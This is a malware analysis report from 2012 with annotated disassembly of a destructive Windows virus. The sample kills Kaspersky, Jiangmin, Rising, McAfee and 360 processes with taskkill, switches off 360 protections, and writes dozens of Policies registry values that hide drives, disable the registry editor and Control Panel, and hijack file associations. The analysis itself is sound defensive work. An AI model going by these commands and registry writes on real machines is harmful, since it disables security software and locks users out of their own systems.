A Simple Virus Analysis
Basic information:
Report title: Analysis of a malicious program
Author: Thend
Report updated: 2012.09.17
Sample first seen: unknown
Sample type: destructive virus
Sample MD5: 654C2392FFD3D4A6843CF86100940779
Packer: none
Language: 易语言 (Easy Programming Language)
Systems at risk: Windows
Related vulnerabilities: none
Summary:
The virus first pops up a prank message box several times. It then kills the processes of a fixed list of antivirus products (Kaspersky, Jiangmin, Rising, McAfee and 360) with taskkill, and finally performs a long series of registry writes that disable or hide most of the system's functions, leaving the computer unusable.
Symptoms on an infected system:
Hidden: all files and folders (the "Show hidden files" option is neutralised); the Start menu's Run, Shut Down, Log Off and Search entries; all drives; Folder Options; the IE home page settings; the File menu; IE Favorites; Internet Options.
Disabled: Control Panel, Registry Editor, access to all drives, printing from IE, IE View Source, IE file downloads, the right-click menus of Explorer, the desktop and IE, restarting into MS-DOS mode, the MS-DOS prompt, the Documents menu and the Start > Settings folders. Task Manager is also targeted, but note that the listing below writes DisableTaskMgr as 0, which does not actually disable it.
All antivirus products are shut down. All application icons change. The file associations of .txt, .inf, .reg and .exe are modified.
File system changes:
Creates 43.vbs, 24.bat, 59.bat and 6.vbs in C:\Windows\system32; they are deleted after they have run.
Registry changes:
See the code analysis below.
Analysis of the main body:
The sample is compiled 易语言 (Easy Programming Language), so nearly every action is a call into the runtime dispatcher at 样本.0040E528 with the library function number in ebx. Arguments are pushed right to left as (type tag, 0, value) triples, followed by the argument count; the tags seen here are 0x80000301 (integer), 0x80000002 (logical), 0x80000004 (text pointer) and 0x80000601 (8-byte double, pushed as two dwords). After the call the caller pops 12 bytes per argument plus 4 (add esp,0x28 for three arguments). From the strings involved, function 0x6A4 is 写注册项 (write registry value), 0x2C0 is 运行 (run a command line, here taskkill /f /im <process>) and 0x300 is 信息框 (message box). The root constants passed to 写注册项 follow the 易语言 convention 1 = HKEY_CLASSES_ROOT, 3 = HKEY_CURRENT_USER, 4 = HKEY_LOCAL_MACHINE, which is consistent with the keys written (360Safe\safemon and the SHOWALL value under HKLM, the Policies values under HKCU, file associations under HKCR). The comment after each call names the value written and its effect.

0040C155 55 push ebp ; entry point
0040C156 8BEC mov ebp,esp
0040C158 81EC 1C000000 sub esp,0x1C
0040C15E 68 04000080 push 0x80000004
0040C163 6A 00 push 0x0
0040C165 68 CB904000 push 样本.004090CB
0040C16A 68 01000000 push 0x1
0040C16F BB 60010000 mov ebx,0x160
0040C174 E8 AF230000 call 样本.0040E528 ; pops up a message box
0040C179 83C4 10 add esp,0x10
0040C17C 68 03000080 push 0x80000003
0040C181 52 push edx
0040C182 50 push eax
0040C183 68 01000000 push 0x1
0040C188 BB 14020000 mov ebx,0x214
0040C18D E8 96230000 call 样本.0040E528 ; pops up a message box
0040C192 83C4 10 add esp,0x10
0040C195 6A 00 push 0x0
0040C197 6A 00 push 0x0
0040C199 6A 00 push 0x0
0040C19B 68 01030080 push 0x80000301
0040C1A0 6A 00 push 0x0
0040C1A2 68 14000000 push 0x14
0040C1A7 68 04000080 push 0x80000004
0040C1AC 6A 00 push 0x0
0040C1AE 68 DA904000 push 样本.004090DA
0040C1B3 68 03000000 push 0x3
0040C1B8 BB 00030000 mov ebx,0x300
0040C1BD E8 66230000 call 样本.0040E528 ; 信息框: pops up a message box
0040C1C2 83C4 28 add esp,0x28
0040C1C5 6A 00 push 0x0
0040C1C7 6A 00 push 0x0
0040C1C9 6A 00 push 0x0
0040C1CB 68 01030080 push 0x80000301
0040C1D0 6A 00 push 0x0
0040C1D2 68 14000000 push 0x14
0040C1D7 68 04000080 push 0x80000004
0040C1DC 6A 00 push 0x0
0040C1DE 68 DA904000 push 样本.004090DA
0040C1E3 68 03000000 push 0x3
0040C1E8 BB 00030000 mov ebx,0x300
0040C1ED E8 36230000 call 样本.0040E528 ; same message box again
0040C1F2 83C4 28 add esp,0x28
0040C1F5 6A 00 push 0x0
0040C1F7 6A 00 push 0x0
0040C1F9 6A 00 push 0x0
0040C1FB 68 01030080 push 0x80000301
0040C200 6A 00 push 0x0
0040C202 68 14000000 push 0x14
0040C207 68 04000080 push 0x80000004
0040C20C 6A 00 push 0x0
0040C20E 68 DA904000 push 样本.004090DA
0040C213 68 03000000 push 0x3
0040C218 BB 00030000 mov ebx,0x300
0040C21D E8 06230000 call 样本.0040E528 ; same message box again
0040C222 83C4 28 add esp,0x28
0040C225 6A 00 push 0x0
0040C227 6A 00 push 0x0
0040C229 6A 00 push 0x0
0040C22B 68 01030080 push 0x80000301
0040C230 6A 00 push 0x0
0040C232 68 14000000 push 0x14
0040C237 68 04000080 push 0x80000004
0040C23C 6A 00 push 0x0
0040C23E 68 DA904000 push 样本.004090DA
0040C243 68 03000000 push 0x3
0040C248 BB 00030000 mov ebx,0x300
0040C24D E8 D6220000 call 样本.0040E528 ; same message box again
0040C252 83C4 28 add esp,0x28
0040C255 68 01030080 push 0x80000301
0040C25A 6A 00 push 0x0
0040C25C 68 01000000 push 0x1
0040C261 68 02000080 push 0x80000002
0040C266 6A 00 push 0x0
0040C268 68 00000000 push 0x0
0040C26D 68 04000080 push 0x80000004
0040C272 6A 00 push 0x0
0040C274 68 F1904000 push 样本.004090F1 ; ASCII "taskkill /f /im kavsvc.exe"
0040C279 68 03000000 push 0x3
0040C27E BB C0020000 mov ebx,0x2C0
0040C283 E8 A0220000 call 样本.0040E528 ; 运行: kill Kaspersky
0040C288 83C4 28 add esp,0x28
0040C28B 68 01030080 push 0x80000301
0040C290 6A 00 push 0x0
0040C292 68 01000000 push 0x1
0040C297 68 02000080 push 0x80000002
0040C29C 6A 00 push 0x0
0040C29E 68 00000000 push 0x0
0040C2A3 68 04000080 push 0x80000004
0040C2A8 6A 00 push 0x0
0040C2AA 68 0C914000 push 样本.0040910C ; ASCII "taskkill /f /im KVXP.kxp"
0040C2AF 68 03000000 push 0x3
0040C2B4 BB C0020000 mov ebx,0x2C0
0040C2B9 E8 6A220000 call 样本.0040E528 ; kill Jiangmin KV
0040C2BE 83C4 28 add esp,0x28
0040C2C1 68 01030080 push 0x80000301
0040C2C6 6A 00 push 0x0
0040C2C8 68 01000000 push 0x1
0040C2CD 68 02000080 push 0x80000002
0040C2D2 6A 00 push 0x0
0040C2D4 68 00000000 push 0x0
0040C2D9 68 04000080 push 0x80000004
0040C2DE 6A 00 push 0x0
0040C2E0 68 25914000 push 样本.00409125 ; ASCII "taskkill /f /im Rav.exe"
0040C2E5 68 03000000 push 0x3
0040C2EA BB C0020000 mov ebx,0x2C0
0040C2EF E8 34220000 call 样本.0040E528 ; kill Rising
0040C2F4 83C4 28 add esp,0x28
0040C2F7 68 01030080 push 0x80000301
0040C2FC 6A 00 push 0x0
0040C2FE 68 01000000 push 0x1
0040C303 68 02000080 push 0x80000002
0040C308 6A 00 push 0x0
0040C30A 68 00000000 push 0x0
0040C30F 68 04000080 push 0x80000004
0040C314 6A 00 push 0x0
0040C316 68 3D914000 push 样本.0040913D ; ASCII "taskkill /f /im Ravmon.exe"
0040C31B 68 03000000 push 0x3
0040C320 BB C0020000 mov ebx,0x2C0
0040C325 E8 FE210000 call 样本.0040E528 ; kill the Rising monitor
0040C32A 83C4 28 add esp,0x28
0040C32D 68 01030080 push 0x80000301
0040C332 6A 00 push 0x0
0040C334 68 01000000 push 0x1
0040C339 68 02000080 push 0x80000002
0040C33E 6A 00 push 0x0
0040C340 68 00000000 push 0x0
0040C345 68 04000080 push 0x80000004
0040C34A 6A 00 push 0x0
0040C34C 68 58914000 push 样本.00409158 ; ASCII "taskkill /f /im Mcshield.exe"
0040C351 68 03000000 push 0x3
0040C356 BB C0020000 mov ebx,0x2C0
0040C35B E8 C8210000 call 样本.0040E528 ; kill the McAfee VirusScan on-access scanner
0040C360 83C4 28 add esp,0x28
0040C363 68 01030080 push 0x80000301
0040C368 6A 00 push 0x0
0040C36A 68 01000000 push 0x1
0040C36F 68 02000080 push 0x80000002
0040C374 6A 00 push 0x0
0040C376 68 00000000 push 0x0
0040C37B 68 04000080 push 0x80000004
0040C380 6A 00 push 0x0
0040C382 68 75914000 push 样本.00409175 ; ASCII "taskkill /f /im VsTskMgr.exe"
0040C387 68 03000000 push 0x3
0040C38C BB C0020000 mov ebx,0x2C0
0040C391 E8 92210000 call 样本.0040E528 ; kill the McAfee VirusScan task manager
0040C396 83C4 28 add esp,0x28
0040C399 68 01030080 push 0x80000301
0040C39E 6A 00 push 0x0
0040C3A0 68 00000000 push 0x0
0040C3A5 68 04000080 push 0x80000004
0040C3AA 6A 00 push 0x0
0040C3AC 68 92914000 push 样本.00409192 ; ASCII "SOFTWARE\360Safe\safemon\ExecAccess"
0040C3B1 68 01030080 push 0x80000301
0040C3B6 6A 00 push 0x0
0040C3B8 68 04000000 push 0x4
0040C3BD 68 03000000 push 0x3
0040C3C2 BB A4060000 mov ebx,0x6A4
0040C3C7 E8 5C210000 call 样本.0040E528 ; 写注册项 (4, ..., 0): 360 safemon ExecAccess = 0 (HKLM)
0040C3CC 83C4 28 add esp,0x28
0040C3CF 68 01030080 push 0x80000301
0040C3D4 6A 00 push 0x0
0040C3D6 68 00000000 push 0x0
0040C3DB 68 04000080 push 0x80000004
0040C3E0 6A 00 push 0x0
0040C3E2 68 B6914000 push 样本.004091B6 ; ASCII "SOFTWARE\360Safe\safemon\MonAccess"
0040C3E7 68 01030080 push 0x80000301
0040C3EC 6A 00 push 0x0
0040C3EE 68 04000000 push 0x4
0040C3F3 68 03000000 push 0x3
0040C3F8 BB A4060000 mov ebx,0x6A4
0040C3FD E8 26210000 call 样本.0040E528 ; MonAccess = 0
0040C402 83C4 28 add esp,0x28
0040C405 68 01030080 push 0x80000301
0040C40A 6A 00 push 0x0
0040C40C 68 00000000 push 0x0
0040C411 68 04000080 push 0x80000004
0040C416 6A 00 push 0x0
0040C418 68 D9914000 push 样本.004091D9 ; ASCII "SOFTWARE\360Safe\safemon\SiteAccess"
0040C41D 68 01030080 push 0x80000301
0040C422 6A 00 push 0x0
0040C424 68 04000000 push 0x4
0040C429 68 03000000 push 0x3
0040C42E BB A4060000 mov ebx,0x6A4
0040C433 E8 F0200000 call 样本.0040E528 ; SiteAccess = 0
0040C438 83C4 28 add esp,0x28
0040C43B 68 01030080 push 0x80000301
0040C440 6A 00 push 0x0
0040C442 68 00000000 push 0x0
0040C447 68 04000080 push 0x80000004
0040C44C 6A 00 push 0x0
0040C44E 68 FD914000 push 样本.004091FD ; ASCII "SOFTWARE\360Safe\safemon\UDiskAccess"
0040C453 68 01030080 push 0x80000301
0040C458 6A 00 push 0x0
0040C45A 68 04000000 push 0x4
0040C45F 68 03000000 push 0x3
0040C464 BB A4060000 mov ebx,0x6A4
0040C469 E8 BA200000 call 样本.0040E528 ; UDiskAccess = 0
0040C46E 83C4 28 add esp,0x28
0040C471 68 01030080 push 0x80000301
0040C476 6A 00 push 0x0
0040C478 68 01000000 push 0x1
0040C47D 68 02000080 push 0x80000002
0040C482 6A 00 push 0x0
0040C484 68 00000000 push 0x0
0040C489 68 04000080 push 0x80000004
0040C48E 6A 00 push 0x0
0040C490 68 22924000 push 样本.00409222 ; ASCII "taskkill /f /im 360tray.exe"
0040C495 68 03000000 push 0x3
0040C49A BB C0020000 mov ebx,0x2C0
0040C49F E8 84200000 call 样本.0040E528 ; kill the 360 real-time protection tray
0040C4A4 83C4 28 add esp,0x28
0040C4A7 68 04000080 push 0x80000004
0040C4AC 6A 00 push 0x0
0040C4AE 68 3E924000 push 样本.0040923E ; ASCII "jpegfile"
0040C4B3 68 04000080 push 0x80000004
0040C4B8 6A 00 push 0x0
0040C4BA 68 47924000 push 样本.00409247 ; ASCII ".txt\"
0040C4BF 68 01030080 push 0x80000301
0040C4C4 6A 00 push 0x0
0040C4C6 68 01000000 push 0x1
0040C4CB 68 03000000 push 0x3
0040C4D0 BB A4060000 mov ebx,0x6A4
0040C4D5 E8 4E200000 call 样本.0040E528 ; HKCR\.txt default = "jpegfile": .txt files open as JPEG
0040C4DA 83C4 28 add esp,0x28
0040C4DD 68 04000080 push 0x80000004
0040C4E2 6A 00 push 0x0
0040C4E4 68 3E924000 push 样本.0040923E ; ASCII "jpegfile"
0040C4E9 68 04000080 push 0x80000004
0040C4EE 6A 00 push 0x0
0040C4F0 68 4D924000 push 样本.0040924D ; ASCII ".inf\"
0040C4F5 68 01030080 push 0x80000301
0040C4FA 6A 00 push 0x0
0040C4FC 68 01000000 push 0x1
0040C501 68 03000000 push 0x3
0040C506 BB A4060000 mov ebx,0x6A4
0040C50B E8 18200000 call 样本.0040E528 ; HKCR\.inf default = "jpegfile"
0040C510 83C4 28 add esp,0x28
0040C513 68 01030080 push 0x80000301
0040C518 6A 00 push 0x0
0040C51A 68 00000000 push 0x0
0040C51F 68 04000080 push 0x80000004
0040C524 6A 00 push 0x0
0040C526 68 53924000 push 样本.00409253 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
0040C52B 68 01030080 push 0x80000301
0040C530 6A 00 push 0x0
0040C532 68 04000000 push 0x4
0040C537 68 03000000 push 0x3
0040C53C BB A4060000 mov ebx,0x6A4
0040C541 E8 E21F0000 call 样本.0040E528 ; CheckedValue = 0 (HKLM): selecting "Show hidden files" no longer takes effect
0040C546 83C4 28 add esp,0x28
0040C549 68 01030080 push 0x80000301
0040C54E 6A 00 push 0x0
0040C550 68 00000000 push 0x0
0040C555 68 04000080 push 0x80000004
0040C55A 6A 00 push 0x0
0040C55C 68 B2924000 push 样本.004092B2 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
0040C561 68 01030080 push 0x80000301
0040C566 6A 00 push 0x0
0040C568 68 03000000 push 0x3
0040C56D 68 03000000 push 0x3
0040C572 BB A4060000 mov ebx,0x6A4
0040C577 E8 AC1F0000 call 样本.0040E528 ; DisableTaskMgr (HKCU), intended to disable Task Manager; note the value pushed is 0, which leaves it enabled (1 would disable it)
0040C57C 83C4 28 add esp,0x28
0040C57F 68 01030080 push 0x80000301
0040C584 6A 00 push 0x0
0040C586 68 01000000 push 0x1
0040C58B 68 04000080 push 0x80000004
0040C590 6A 00 push 0x0
0040C592 68 FB924000 push 样本.004092FB ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel"
0040C597 68 01030080 push 0x80000301
0040C59C 6A 00 push 0x0
0040C59E 68 03000000 push 0x3
0040C5A3 68 03000000 push 0x3
0040C5A8 BB A4060000 mov ebx,0x6A4
0040C5AD E8 761F0000 call 样本.0040E528 ; NoControlPanel = 1: disable Control Panel
0040C5B2 83C4 28 add esp,0x28
0040C5B5 68 01030080 push 0x80000301
0040C5BA 6A 00 push 0x0
0040C5BC 68 01000000 push 0x1
0040C5C1 68 04000080 push 0x80000004
0040C5C6 6A 00 push 0x0
0040C5C8 68 46934000 push 样本.00409346 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools"
0040C5CD 68 01030080 push 0x80000301
0040C5D2 6A 00 push 0x0
0040C5D4 68 03000000 push 0x3
0040C5D9 68 03000000 push 0x3
0040C5DE BB A4060000 mov ebx,0x6A4
0040C5E3 E8 401F0000 call 样本.0040E528 ; DisableRegistryTools = 1: disable Registry Editor (regedit)
0040C5E8 83C4 28 add esp,0x28
0040C5EB 68 01030080 push 0x80000301
0040C5F0 6A 00 push 0x0
0040C5F2 68 01000000 push 0x1
0040C5F7 68 04000080 push 0x80000004
0040C5FC 6A 00 push 0x0
0040C5FE 68 95934000 push 样本.00409395 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun"
0040C603 68 01030080 push 0x80000301
0040C608 6A 00 push 0x0
0040C60A 68 03000000 push 0x3
0040C60F 68 03000000 push 0x3
0040C614 BB A4060000 mov ebx,0x6A4
0040C619 E8 0A1F0000 call 样本.0040E528 ; NoRun = 1: remove Run from the Start menu
0040C61E 83C4 28 add esp,0x28
0040C621 68 01030080 push 0x80000301
0040C626 6A 00 push 0x0
0040C628 68 01000000 push 0x1
0040C62D 68 04000080 push 0x80000004
0040C632 6A 00 push 0x0
0040C634 68 D7934000 push 样本.004093D7 ; ASCII "SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled"
0040C639 68 01030080 push 0x80000301
0040C63E 6A 00 push 0x0
0040C640 68 03000000 push 0x3
0040C645 68 03000000 push 0x3
0040C64A BB A4060000 mov ebx,0x6A4
0040C64F E8 D41E0000 call 样本.0040E528 ; WinOldApp\Disabled = 1: disable the MS-DOS prompt; the stored path has stray spaces before the backslashes, so as written the value lands under a non-existent key
0040C654 83C4 28 add esp,0x28
0040C657 68 01060080 push 0x80000601
0040C65C 68 FFFFEF41 push 0x41EFFFFF
0040C661 68 0000E0FF push 0xFFE00000
0040C666 68 04000080 push 0x80000004
0040C66B 6A 00 push 0x0
0040C66D 68 21944000 push 样本.00409421 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives"
0040C672 68 01030080 push 0x80000301
0040C677 6A 00 push 0x0
0040C679 68 03000000 push 0x3
0040C67E 68 03000000 push 0x3
0040C683 BB A4060000 mov ebx,0x6A4
0040C688 E8 9B1E0000 call 样本.0040E528 ; NoDrives = 4294967295 (the double 0x41EFFFFFFFE00000, i.e. 0xFFFFFFFF): hide all drives
0040C68D 83C4 28 add esp,0x28
0040C690 68 01060080 push 0x80000601
0040C695 68 FFFFEF41 push 0x41EFFFFF
0040C69A 68 0000E0FF push 0xFFE00000
0040C69F 68 04000080 push 0x80000004
0040C6A4 6A 00 push 0x0
0040C6A6 68 66944000 push 样本.00409466 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive"
0040C6AB 68 01030080 push 0x80000301
0040C6B0 6A 00 push 0x0
0040C6B2 68 03000000 push 0x3
0040C6B7 68 03000000 push 0x3
0040C6BC BB A4060000 mov ebx,0x6A4
0040C6C1 E8 621E0000 call 样本.0040E528 ; NoViewOnDrive = 0xFFFFFFFF: block access to all drives
0040C6C6 83C4 28 add esp,0x28
0040C6C9 68 01030080 push 0x80000301
0040C6CE 6A 00 push 0x0
0040C6D0 68 01000000 push 0x1
0040C6D5 68 04000080 push 0x80000004
0040C6DA 6A 00 push 0x0
0040C6DC 68 B0944000 push 样本.004094B0 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions"
0040C6E1 68 01030080 push 0x80000301
0040C6E6 6A 00 push 0x0
0040C6E8 68 03000000 push 0x3
0040C6ED 68 03000000 push 0x3
0040C6F2 BB A4060000 mov ebx,0x6A4
0040C6F7 E8 2C1E0000 call 样本.0040E528 ; NoFolderOptions = 1: hide Folder Options
0040C6FC 83C4 28 add esp,0x28
0040C6FF 68 01030080 push 0x80000301
0040C704 6A 00 push 0x0
0040C706 68 01000000 push 0x1
0040C70B 68 04000080 push 0x80000004
0040C710 6A 00 push 0x0
0040C712 68 FC944000 push 样本.004094FC ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop"
0040C717 68 01030080 push 0x80000301
0040C71C 6A 00 push 0x0
0040C71E 68 03000000 push 0x3
0040C723 68 03000000 push 0x3
0040C728 BB A4060000 mov ebx,0x6A4
0040C72D E8 F61D0000 call 样本.0040E528 ; NoDesktop = 1: hide all desktop items
0040C732 83C4 28 add esp,0x28
0040C735 68 01030080 push 0x80000301
0040C73A 6A 00 push 0x0
0040C73C 68 01000000 push 0x1
0040C741 68 04000080 push 0x80000004
0040C746 6A 00 push 0x0
0040C748 68 42954000 push 样本.00409542 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose"
0040C74D 68 01030080 push 0x80000301
0040C752 6A 00 push 0x0
0040C754 68 03000000 push 0x3
0040C759 68 03000000 push 0x3
0040C75E BB A4060000 mov ebx,0x6A4
0040C763 E8 C01D0000 call 样本.0040E528 ; NoClose = 1: remove Shut Down from the Start menu
0040C768 83C4 28 add esp,0x28
0040C76B 68 01030080 push 0x80000301
0040C770 6A 00 push 0x0
0040C772 68 01000000 push 0x1
0040C777 68 04000080 push 0x80000004
0040C77C 6A 00 push 0x0
0040C77E 68 86954000 push 样本.00409586 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind"
0040C783 68 01030080 push 0x80000301
0040C788 6A 00 push 0x0
0040C78A 68 03000000 push 0x3
0040C78F 68 03000000 push 0x3
0040C794 BB A4060000 mov ebx,0x6A4
0040C799 E8 8A1D0000 call 样本.0040E528 ; NoFind = 1: remove Search from the Start menu
0040C79E 83C4 28 add esp,0x28
0040C7A1 68 01030080 push 0x80000301
0040C7A6 6A 00 push 0x0
0040C7A8 68 01000000 push 0x1
0040C7AD 68 04000080 push 0x80000004
0040C7B2 6A 00 push 0x0
0040C7B4 68 C9954000 push 样本.004095C9 ; ASCII "Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage"
0040C7B9 68 01030080 push 0x80000301
0040C7BE 6A 00 push 0x0
0040C7C0 68 03000000 push 0x3
0040C7C5 68 03000000 push 0x3
0040C7CA BB A4060000 mov ebx,0x6A4
0040C7CF E8 541D0000 call 样本.0040E528 ; HomePage = 1: lock the IE home page setting
0040C7D4 83C4 28 add esp,0x28
0040C7D7 68 01030080 push 0x80000301
0040C7DC 6A 00 push 0x0
0040C7DE 68 01000000 push 0x1
0040C7E3 68 04000080 push 0x80000004
0040C7E8 6A 00 push 0x0
0040C7EA 68 0E964000 push 样本.0040960E ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu"
0040C7EF 68 01030080 push 0x80000301
0040C7F4 6A 00 push 0x0
0040C7F6 68 03000000 push 0x3
0040C7FB 68 03000000 push 0x3
0040C800 BB A4060000 mov ebx,0x6A4
0040C805 E8 1E1D0000 call 样本.0040E528 ; NoFileMenu = 1: remove the File menu from Explorer and IE
0040C80A 83C4 28 add esp,0x28
0040C80D 68 01030080 push 0x80000301
0040C812 6A 00 push 0x0
0040C814 68 01000000 push 0x1
0040C819 68 04000080 push 0x80000004
0040C81E 6A 00 push 0x0
0040C820 68 55964000 push 样本.00409655 ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites"
0040C825 68 01030080 push 0x80000301
0040C82A 6A 00 push 0x0
0040C82C 68 03000000 push 0x3
0040C831 68 03000000 push 0x3
0040C836 BB A4060000 mov ebx,0x6A4
0040C83B E8 E81C0000 call 样本.0040E528 ; NoFavorites = 1: hide IE Favorites
0040C840 83C4 28 add esp,0x28
0040C843 68 01030080 push 0x80000301
0040C848 6A 00 push 0x0
0040C84A 68 01000000 push 0x1
0040C84F 68 04000080 push 0x80000004
0040C854 6A 00 push 0x0
0040C856 68 9C964000 push 样本.0040969C ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting"
0040C85B 68 01030080 push 0x80000301
0040C860 6A 00 push 0x0
0040C862 68 03000000 push 0x3
0040C867 68 03000000 push 0x3
0040C86C BB A4060000 mov ebx,0x6A4
0040C871 E8 B21C0000 call 样本.0040E528 ; NoPrinting = 1: disable printing from IE
0040C876 83C4 28 add esp,0x28
0040C879 68 01030080 push 0x80000301
0040C87E 6A 00 push 0x0
0040C880 68 01000000 push 0x1
0040C885 68 04000080 push 0x80000004
0040C88A 6A 00 push 0x0
0040C88C 68 E2964000 push 样本.004096E2 ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions"
0040C891 68 01030080 push 0x80000301
0040C896 6A 00 push 0x0
0040C898 68 03000000 push 0x3
0040C89D 68 03000000 push 0x3
0040C8A2 BB A4060000 mov ebx,0x6A4
0040C8A7 E8 7C1C0000 call 样本.0040E528 ; NoBrowserOptions = 1: disable Internet Options
0040C8AC 83C4 28 add esp,0x28
0040C8AF 68 01030080 push 0x80000301
0040C8B4 6A 00 push 0x0
0040C8B6 68 01000000 push 0x1
0040C8BB 68 04000080 push 0x80000004
0040C8C0 6A 00 push 0x0
0040C8C2 68 2E974000 push 样本.0040972E ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource"
0040C8C7 68 01030080 push 0x80000301
0040C8CC 6A 00 push 0x0
0040C8CE 68 03000000 push 0x3
0040C8D3 68 03000000 push 0x3
0040C8D8 BB A4060000 mov ebx,0x6A4
0040C8DD E8 461C0000 call 样本.0040E528 ; NoViewSource = 1: disable View Source in IE
0040C8E2 83C4 28 add esp,0x28
0040C8E5 68 01030080 push 0x80000301
0040C8EA 6A 00 push 0x0
0040C8EC 68 03000000 push 0x3
0040C8F1 68 04000080 push 0x80000004
0040C8F6 6A 00 push 0x0
0040C8F8 68 76974000 push 样本.00409776 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803"
0040C8FD 68 01030080 push 0x80000301
0040C902 6A 00 push 0x0
0040C904 68 03000000 push 0x3
0040C909 68 03000000 push 0x3
0040C90E BB A4060000 mov ebx,0x6A4
0040C913 E8 101C0000 call 样本.0040E528 ; Zones\3\1803 = 3: disable file downloads in the Internet zone (the stored path reads "Interner Settings", not "Internet Settings")
0040C918 83C4 28 add esp,0x28
0040C91B 68 01030080 push 0x80000301
0040C920 6A 00 push 0x0
0040C922 68 01000000 push 0x1
0040C927 68 04000080 push 0x80000004
0040C92C 6A 00 push 0x0
0040C92E 68 BF974000 push 样本.004097BF ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu"
0040C933 68 01030080 push 0x80000301
0040C938 6A 00 push 0x0
0040C93A 68 03000000 push 0x3
0040C93F 68 03000000 push 0x3
0040C944 BB A4060000 mov ebx,0x6A4
0040C949 E8 DA1B0000 call 样本.0040E528 ; NoBrowserContextMenu = 1: disable the IE right-click menu
0040C94E 83C4 28 add esp,0x28
0040C951 68 01030080 push 0x80000301
0040C956 6A 00 push 0x0
0040C958 68 01000000 push 0x1
0040C95D 68 04000080 push 0x80000004
0040C962 6A 00 push 0x0
0040C964 68 0F984000 push 样本.0040980F ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode"
0040C969 68 01030080 push 0x80000301
0040C96E 6A 00 push 0x0
0040C970 68 03000000 push 0x3
0040C975 68 03000000 push 0x3
0040C97A BB A4060000 mov ebx,0x6A4
0040C97F E8 A41B0000 call 样本.0040E528 ; NoRealMode = 1: disable restarting into MS-DOS mode
0040C984 83C4 28 add esp,0x28
0040C987 68 01030080 push 0x80000301
0040C98C 6A 00 push 0x0
0040C98E 68 01000000 push 0x1
0040C993 68 04000080 push 0x80000004
0040C998 6A 00 push 0x0
0040C99A 68 56984000 push 样本.00409856 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff"
0040C99F 68 01030080 push 0x80000301
0040C9A4 6A 00 push 0x0
0040C9A6 68 03000000 push 0x3
0040C9AB 68 03000000 push 0x3
0040C9B0 BB A4060000 mov ebx,0x6A4
0040C9B5 E8 6E1B0000 call 样本.0040E528 ; NoLogOff = 1: remove Log Off from the Start menu
0040C9BA 83C4 28 add esp,0x28
0040C9BD 68 01030080 push 0x80000301
0040C9C2 6A 00 push 0x0
0040C9C4 68 01000000 push 0x1
0040C9C9 68 04000080 push 0x80000004
0040C9CE 6A 00 push 0x0
0040C9D0 68 9B984000 push 样本.0040989B ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu"
0040C9D5 68 01030080 push 0x80000301
0040C9DA 6A 00 push 0x0
0040C9DC 68 03000000 push 0x3
0040C9E1 68 03000000 push 0x3
0040C9E6 BB A4060000 mov ebx,0x6A4
0040C9EB E8 381B0000 call 样本.0040E528 ; NoRecentDocsMenu = 1: hide the Documents menu
0040C9F0 83C4 28 add esp,0x28
0040C9F3 68 01030080 push 0x80000301
0040C9F8 6A 00 push 0x0
0040C9FA 68 01000000 push 0x1
0040C9FF 68 04000080 push 0x80000004
0040CA04 6A 00 push 0x0
0040CA06 68 56984000 push 样本.00409856 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff"
0040CA0B 68 01030080 push 0x80000301
0040CA10 6A 00 push 0x0
0040CA12 68 03000000 push 0x3
0040CA17 68 03000000 push 0x3
0040CA1C BB A4060000 mov ebx,0x6A4
0040CA21 E8 021B0000 call 样本.0040E528 ; NoLogOff = 1 again (duplicate of the write above)
0040CA26 83C4 28 add esp,0x28
0040CA29 68 01030080 push 0x80000301
0040CA2E 6A 00 push 0x0
0040CA30 68 01000000 push 0x1
0040CA35 68 04000080 push 0x80000004
0040CA3A 6A 00 push 0x0
0040CA3C 68 E8984000 push 样本.004098E8 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu"
0040CA41 68 01030080 push 0x80000301
0040CA46 6A 00 push 0x0
0040CA48 68 03000000 push 0x3
0040CA4D 68 03000000 push 0x3
0040CA52 BB A4060000 mov ebx,0x6A4
0040CA57 E8 CC1A0000 call 样本.0040E528 ; NoViewContextMenu = 1: disable right-click menus in Explorer and on the desktop
0040CA5C 83C4 28 add esp,0x28
0040CA5F 68 01030080 push 0x80000301
0040CA64 6A 00 push 0x0
0040CA66 68 01000000 push 0x1
0040CA6B 68 04000080 push 0x80000004
0040CA70 6A 00 push 0x0
0040CA72 68 36994000 push 样本.00409936 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders"
0040CA77 68 01030080 push 0x80000301
0040CA7C 6A 00 push 0x0
0040CA7E 68 03000000 push 0x3
0040CA83 68 03000000 push 0x3
0040CA88 BB A4060000 mov ebx,0x6A4
0040CA8D E8 961A0000 call 样本.0040E528 ; NoSetFolders = 1: remove Control Panel, Printers and Network from Start > Settings
